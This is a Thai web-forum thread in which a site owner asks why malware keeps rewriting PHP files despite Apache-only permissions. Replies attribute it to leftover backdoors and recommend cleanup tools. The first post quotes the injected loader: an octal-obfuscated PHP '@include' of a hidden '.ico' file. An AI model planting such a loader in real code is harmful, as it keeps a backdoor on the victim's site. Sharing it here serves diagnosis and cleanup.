ยินดีต้อนรับคุณ, บุคคลทั่วไป กรุณา เข้าสู่ระบบ หรือ ลงทะเบียน

เข้าสู่ระบบด้วยชื่อผู้ใช้ รหัสผ่าน และระยะเวลาในเซสชั่น

ThaiSEOBoard.comHost and DomainHost & Domain (register)ไวรัสที่ฝังในเว็บใช้สิทธิ์ Apache ได้ด้วยเหรอครับ ***************
หน้า: [1]   ลงล่าง
พิมพ์
ผู้เขียน หัวข้อ: ไวรัสที่ฝังในเว็บใช้สิทธิ์ Apache ได้ด้วยเหรอครับ ***************  (อ่าน 1123 ครั้ง)
0 สมาชิก และ 1 บุคคลทั่วไป กำลังดูหัวข้อนี้
Fallen
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 162
ออฟไลน์ ออฟไลน์

กระทู้: 2,751



ดูรายละเอียด เว็บไซต์
« เมื่อ: 19 พฤษภาคม 2018, 11:25:23 »

เว็บโดนไวรัส แก้ไขไฟล์ เพิ่มใน php เช่น index.php
code เป็นแบบนี้ครับ

โค๊ด:
@include "\057h\157m\145/\147o\154d\145a\147/\160u\142l\151c\137h\164m\154/\144r\165p\141l\137n\145w\163/\155o\144u\154e\163/\143o\156t\145x\164u\141l\057.\0625\070d\1458\1434\056i\143o";

ซึ่งแกะได้จากเว็บนี้
https://malwaredecoder.com/res...e89422e04a15bfc78ff71b411208db

หลังลบโค๊ดเเล้ว ซึ่งคิดว่าน่าจะหมด หรือ อาจจะค้างอยู่ก็ได้ ,
ผมให้โฮสต์ดำเนินการ
1. block ip ต่างประเทศทั้งหมด
2. เปลี่ยนสิทธิ์ให้ Apache ซึ่งทำให้แม้แต่เจ้าของ Accout เองก็ อัพไฟล์ หรือ แก้ ไม่ได้ ผ่านทาง FTP
ทำได้ทางเดียวคือ เข้า Direct Admin เเล้ว reset owner แต่ก็จะเปลี่ยนสิทธิ์กลับมาเป็น Apache เองไม่ได้ ต้องให้โฮต์ทำ

ล่าสุด เวลา 5.55 มันจะมาแก้ไฟล์และสร้างไฟล์ไวรัสขึ้นมาอีกได้ โดย สิทธิ์ยังเป็น Apache

มันมี script code แบบนี้ด้วยเหรอ สุดยอดจริงๆ
หรือ ว่ามันได้ pass/user ของคนดนดูแลโฮสต์ไปเเล้วครับ

ปล1.ถามเพื่อเป็นความรู้ มิได้โจมตีหรืออะไร โฮสก็ดูแลแก้ปัญหามาให้ตลอด)
ปล2.เผื่อจะได้พบผู้ให้บริการโฮสต์ ที่ความเชี่ยวชาญด้านนี้ อาจได้เป็นที่พักพิงในอนาคตสำหรับเว็บที่ต้องการ securityมากๆ

 wanwan017
บันทึกการเข้า

dermapond
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 127
ออฟไลน์ ออฟไลน์

กระทู้: 1,749



ดูรายละเอียด เว็บไซต์
« ตอบ #1 เมื่อ: 19 พฤษภาคม 2018, 12:08:21 »

ยังลบไฟล์ที่โดนฝังออกไม่หมดครับ
ฝั่งที่แฮกจะสามารถคอนโทรลไฟลเราได้หมดครับ ไม่ว่าจะอัพโหลดไฟล์ แก้ไขไฟล์ ลบไฟล์ cmodไฟล์ แม้กระทั่งเปลี่ยนวันที่ของไฟล์ก็ได้ครับ โดยการเจาะช่องโหว่ของWordPress และสคริปต่างๆ ไม่เกี่ยวกับApache สำหรับเคสนี้ครับ

การแฮกWordPress นั้นปัจจุบันง่ายมาก แต่ตรงนี้ไม่ขอพูดถึงครับ อาจจะเป็นดาบสองคมครับ

แนะนำติดตั้งปลั๊กอิน wordfence สำหรับWordPress ครับก็จะช่วยได้ดีครับ ส่วนสคริปอื่นๆต้องแก้กันตามหน้างานซึ่งไม่ค่อยนิยมแฮกเท่าWordPress ครับ
« แก้ไขครั้งสุดท้าย: 19 พฤษภาคม 2018, 12:20:10 โดย dermapond » บันทึกการเข้า

แสงประกายดอทคอม

WordPress Hosting เร็ว แรง มาก ฟรี SSL ระบบ Cpanel เลือก PHP 4.4-8.2 ได้ รองรับ Node.js, Python
Coolhostplus
สมุนแก๊งเสียว
*

พลังน้ำใจ: 88
ออฟไลน์ ออฟไลน์

กระทู้: 528



ดูรายละเอียด เว็บไซต์
« ตอบ #2 เมื่อ: 19 พฤษภาคม 2018, 12:39:19 »

ยังลบไฟล์ที่โดนฝังออกไม่หมด ตามเม้นบน

ลองดึงไฟล์มาไว้ในคอมแล้วใช้ nod32 สแกนดูครับ

หรือ ถ้าเป็น VPS ลองเปิด Apache error_log ดู
บันทึกการเข้า

Post654321
คนรักเสียว
*

พลังน้ำใจ: 13
ออฟไลน์ ออฟไลน์

กระทู้: 167



ดูรายละเอียด เว็บไซต์
« ตอบ #3 เมื่อ: 19 พฤษภาคม 2018, 16:26:44 »

ตามนั้นเลยครับ ยังไม่สะอาด wanwan044
บันทึกการเข้า

ต้องการโต๊ะจีน สั่งโต๊ะจีนสมปองโภชนา โต๊ะจีนยุคใหม่ อาหารอร่อย
หน้า: [1]   ขึ้นบน
พิมพ์